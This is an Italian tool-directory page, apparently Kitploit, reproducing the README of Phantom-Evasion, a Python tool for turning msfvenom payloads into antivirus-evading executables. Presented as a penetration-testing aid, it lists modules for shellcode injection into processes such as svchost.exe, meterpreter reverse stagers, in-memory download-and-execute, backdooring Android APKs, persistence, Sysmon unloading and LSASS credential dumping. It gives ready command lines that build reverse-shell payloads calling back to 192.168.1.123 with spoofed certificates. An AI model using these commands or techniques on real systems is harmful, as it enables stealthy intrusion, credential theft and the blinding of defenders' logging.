Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PhantomEvasion — Strumento di evasione antivirus basato su Python che genera eseguibili non rilevabili a partire da payload di msfvenom con tecniche avanzate come iniezione di junkcode, crittografia, spoofing di certificati e molteplici metodi di esecuzione. | Kitploit
Strumenti/GitHubGitHub/esskumar/phantomevasion
Escalation di PrivilegiFramework di ExploitGenerazione di PayloadMeccanismi di PersistenzaShellcodePost-ExploitPenetration TestingRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Strumento di evasione antivirus basato su Python che genera eseguibili non rilevabili a partire da payload di msfvenom con tecniche avanzate come iniezione di junkcode, crittografia, spoofing di certificati e molteplici metodi di esecuzione.

1716 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

PHANTOM EVASION 3.0

Phantom-Evasion è uno strumento di evasione antivirus scritto in Python (compatibile sia con Python 2 che Python 3) in grado di generare eseguibili (quasi) totalmente non rilevabili anche con i payload più comuni di msfvenom x86.

I seguenti sistemi operativi supportano ufficialmente l'installazione automatica:

  1. Kali Linux
  2. Parrot Security

I seguenti sistemi operativi probabilmente supportano l'installazione automatica ma richiedono l'installazione manuale di metasploit-framework:

  1. OSX (testato su Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. altre distribuzioni Debian
  7. Centos
  8. Fedora
  9. Blackarch

I seguenti sistemi operativi richiedono configurazione manuale:

  1. Windows 10

Basta clonare con git o scaricare e decomprimere la cartella Phantom-Evasion.

Installazione:

Installazione automatica, apri un terminale ed esegui:

root@kitploit:~
python3 phantom-evasion.py --setup

oppure:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

oppure avvia phantom-evasion in modalità interattiva e seleziona l'opzione 7.

Dipendenze (solo per installazione manuale)

  1. metasploit-framework
  2. mingw-w64 (cygwin su windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

CMDLINE/INTERATTIVO:

  1. Avvia phantom-evasion in modalità interattiva:
root@kitploit:~
python3 phantom-evasion.py

oppure:

root@kitploit:~
./phantom-evasion.py
  1. Altrimenti per vedere le opzioni della modalità da riga di comando:
root@kitploit:~
python3 phantom-evasion.py --help

oppure:

root@kitploit:~
./phantom-evasion.py --help

Moduli WINDOWS

-Ogni modulo payload Windows in C può essere compilato (supporta sia x86 che x64) come EXE o DLL/ReflectiveDLL.

-Iniezione di codice junk randomizzato (puoi impostare intensità, frequenza e probabilità di reiniezione) e tecniche di evasione antivirus per Windows (frequenza impostabile).

-Cifratura shellcode/file Multibyte Xor/Vigenere supportata sia nei moduli di iniezione shellcode che di Download Exec.

-Tecnica di unhookapi Ntdll e mascheramento del processo Peb supportate.

-Ampia gamma di modalità di esecuzione supportate (sia locali che remote).

-Ampia gamma di modalità di allocazione memoria payload (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-Caricamento dinamico delle API Windows impostabile.

-Spoofer e firmatario di certificati supportati.

-Eseguibile strip (https://en.wikipedia.org/wiki/Strip_(Unix))

Iniezione Shellcode Windows in C

Supporto per payload Windows di msfvenom e shellcode personalizzati. Lo shellcode può essere memorizzato come risorsa e recuperato a runtime con l'API FindResource.

Cifratura Shellcode supportata:

root@kitploit:~
1.none

2.Multibyte-Xor

3.Double-key Multibyte-Xor

4.Vigenere

5.Double-key Vigenere
  1. Il metodo di esecuzione locale può essere uno dei seguenti:

    Thread

    APC

    La modalità di allocazione memoria locale può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Il metodo di esecuzione remota può essere uno dei seguenti:

    ThreadExecutionHijack (abbreviato TEH)

    Processinject (abbreviato PI)

    APCSpray (abbreviato APCS)

    EarlyBird (abbreviato EB)

    EntryPointHijack (abbreviato EPH)

    La modalità di allocazione memoria remota può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager meterpreter Windows in C puro (C)

Moduli stager meterpreter in C puro (TCP/HTTP/HTTPS) compatibili con msfconsole e cobalt strike beacon. (reverse_tcp/reverse_http/reverse_https)

Usando la modalità da riga di comando:

root@kitploit:~
reverse_tcp c stager è WRT

reverse_http c stager è WRH

reverse_https c stager è WRS
  1. Il metodo di esecuzione locale può essere uno dei seguenti:

    Thread

    APC

    La modalità di allocazione memoria locale può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows Download-Exec NoDiskWrite in C

Scarica exe/dll dall'URL fornito in memoria ed esegui/carica in un processo remoto (senza scrivere su disco).

Download di EXE/DLL cifrati supportato:

root@kitploit:~
1.none
                                 
2.Multibyte-Xor
                                 
3.Double-key Multibyte-Xor
                               
4.Vigenere
                                
5.Double-key Vigenere

La DLL/EXE cifrata verrà salvata come nomefileoriginale + "crypt" + ".dll" o ".exe" — questo è il file da scaricare

  1. Windows DownloadExecExe NoDiskWrite (WDE in modalità da riga di comando):

    Il metodo di esecuzione remota può essere uno dei seguenti:

    ProcessHollowing (abbreviato PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD in modalità da riga di comando):

    Il metodo di caricamento remoto può essere uno dei seguenti:

    ReflectiveDll (abbreviato RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abbreviato MM) ---> solo x86

PAYLOAD LINUX

Modulo Iniezione Shellcode Linux (C)

Supporto per payload Linux di msfvenom e shellcode personalizzati.

PAYLOAD ANDROID

  1. Backdoor Obfuscata Msfvenom Android:

    Oscura i payload msfvenom e ricostruisci (smali/baksmali) con apktool. Il payload offuscato può essere usato per infettare file apk benigni.

Moduli di PERSISTENZA

  1. Persistenza Windows RegCreateKeyExW Aggiungi Chiave di Registro (C) L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito specificando il percorso completo del file da aggiungere all'avvio come argomento.

  2. Persistenza Windows Aggiungi Chiave di Registro con REG (CMD) Questo modulo genera payload da riga di comando per la persistenza (Aggiungi chiave di registro tramite REG.exe).

  3. Persistenza Windows Mantieni Processo in Vita (C) L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito. Usa CreateToolSnapshoot, ProcessFirst e ProcessNext per verificare se il processo specificato è vivo ogni X secondi (se non lo è, crea un nuovo processo usando l'API WinExec).

  4. Persistenza Windows Schtasks (CMD)

    Questo modulo genera payload da riga di comando per la persistenza (tramite Schtasks.exe).

  5. Persistenza Windows Crea Servizio (CMD)

    Questo modulo genera payload da riga di comando per la persistenza (tramite sc.exe).

Moduli di ELEVAZIONE DEI PRIVILEGI

  1. Windows DuplicateTokenEx (C)

    Crea un nuovo processo con un token clonato da un altro processo. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

Moduli di POST-SFRUTTAMENTO

  1. Windows Scarica Sysmon (C) Scarica il driver sysmon, causando l'arresto della registrazione dei log degli eventi sysmon da parte del sistema. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  2. Windows Scarica Sysmon (CMD) Scarica il driver sysmon, causando l'arresto della registrazione dei log degli eventi sysmon da parte del sistema.

  3. Windows Nascondi file con attrib (CMD) Usa attrib per nascondere il file

  4. Windows SetFileAttribute nascosto (C) Nascondi file usando l'API SetFileAttribute L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  5. Windows DumpLsass (C) Dump di Lsass usando l'API MiniWriteDumpWrite. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  6. Windows DumpLsass (CMD)

    Dump di Lsass da riga di comando.

Esempi di modalità da riga di comando di Phantom-Evasion:

  1. iniezione shellcode Windows, eseguibile firmato con certificato https contraffatto, metodo di esecuzione locale: Thread, memoria: Virtual_RWX, cifratura: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. iniezione shellcode Windows x64, output come dll riflessiva, metodo di esecuzione remota: ProcessInject (PI), memoria: Virtual_RW/RX, processo target: SkypeApp.exe, cifratura: doppia chiave xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. iniezione shellcode Windows x64, output come dll strisciata (strip), shellcode memorizzato come risorsa, metodo di esecuzione remota: EarlyBird (EB), memoria: Virtual_RW/RX, processo target: svchost.exe, cifratura: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. stager reverse https Windows x64, output come dll strisciata (strip), metodo di esecuzione locale: Thread, memoria: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. downloadexec dll Windows x86, output come exe strisciato (strip), metodo di esecuzione remota: ManualMap (MM), processo target: OneDrive.exe, dimensione download 1000000 byte
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. downloadexec exe Windows x64, output come dll riflessiva strisciata (strip), metodo di esecuzione remota: ProcessHollowing (PH), processo target: svchost.exe, dimensione download 1000000 byte
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licenza

GPLv3.0

Crediti e risorse utili

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Scarica lo strumento